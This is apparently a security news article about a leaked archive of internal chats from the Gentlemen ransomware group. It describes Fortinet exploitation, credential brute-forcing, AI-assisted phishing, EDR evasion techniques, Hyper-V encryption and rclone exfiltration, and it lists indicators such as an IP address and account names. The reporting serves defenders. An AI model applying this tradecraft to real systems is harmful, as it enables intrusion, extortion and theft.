A newly analyzed leak tied to The Gentlemen ransomware group reveals how modern ransomware operations are evolving in structure and tooling while relying on the same proven intrusion techniques seen over the past four years.
The leak also highlights operator continuity across major ransomware brands. A threat actor known as “Tinker” appears across Conti (2022), Black Basta (2025), and now The Gentlemen (2026), maintaining the same role focused on phishing, negotiation, and credential operations.
Shared infrastructure, including the Matrix server bestflowers247.online, further supports attribution overlap between these groups, reinforcing the pattern that ransomware actors rebrand rather than retire.
Despite organizational changes, initial access techniques remain largely unchanged. The Gentlemen heavily relied on Fortinet edge devices, with at least 81 references to FortiGate systems in the chat logs.
The group explicitly discussed exploiting CVE-2024-55591, a FortiOS authentication bypass vulnerability. In parallel, brute-force activity targeting approximately 1,000 Fortinet VPN instances was observed, often using weak or reused credentials such as “gentlemen25” and “Gentlemen25.”
This mirrors earlier activity from Black Basta and Conti, where exploitation of edge devices and known vulnerabilities consistently enabled access.
Artificial intelligence has become embedded in operations, but not in the way often assumed. Instead of generating malware, actors are using AI tools such as ChatGPT and Claude for social engineering, scripting, and data processing.
Internal conversations show AI being used to craft phishing messages, automate victim communication, and assist with code translation for malware variants.
According to Vectra AI, released in May 2026 and analyzed by Ransom-ISAC, contains 3,366 internal Rocket.Chat messages along with infrastructure artifacts, offering insight into one of the most active ransomware crews of the year.
The group also experimented with uncensored large language models hosted on platforms like Hugging Face and leveraged rented GPU infrastructure for analyzing stolen data.
However, operators expressed mixed confidence in AI outputs, indicating it remains a support tool rather than a primary capability.
Tooling has evolved more significantly. The Gentlemen replaced traditional frameworks like Cobalt Strike with a custom command-and-control platform known as G-BOT.
This framework supports SOCKS5 tunneling and uses public file-sharing services such as temp.sh and 0x0.st for payload delivery.
Earlier development efforts by Black Basta, such as the Breaker C2 framework with TCP, DNS, and ICMP communication channels, demonstrate a broader trend toward proprietary tooling to evade detection.
Endpoint detection and response systems are no longer avoided but actively bypassed. Techniques referenced in the leak include NTDLL unhooking, direct syscall execution, ETW patching, and manipulation of debug registers.
One operator claimed that tools capable of disabling leading EDR solutions cost around $5,000, suggesting a mature underground market for defensive evasion capabilities.
The leak also exposes a growing focus on hypervisor-level attacks. The Gentlemen targeted Hyper-V environments directly, encrypting virtual machine storage at the host level.
This approach bypasses guest-based monitoring tools, leaving endpoint security blind to ongoing encryption activity.
Post-exploitation activity remains consistent with historical ransomware operations. Credential harvesting tools such as LummaC2, Phemedrone Stealer, and DumpBrowserSecrets were used to extract browser-stored credentials.
Domain compromise was achieved through Volume Shadow Copy backups of NTDS.dit, enabling full credential access. Data exfiltration followed a familiar pattern using rclone to transfer stolen data via a Synology NAS staging server to MEGA cloud storage.
One exposed configuration showed active exfiltration to IP 193.228.128.2 over port 2222 using the account “d0wnloAd1.”
Overall, the Gentlemen leak reinforces a critical pattern in ransomware operations: innovation is concentrated in evasion, infrastructure, and scale, while core intrusion methods remain unchanged.
Exploiting edge devices, harvesting credentials, and leveraging trusted tools for exfiltration continue to succeed, indicating that defensive gaps persist despite years of public disclosures and threat intelligence reporting.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
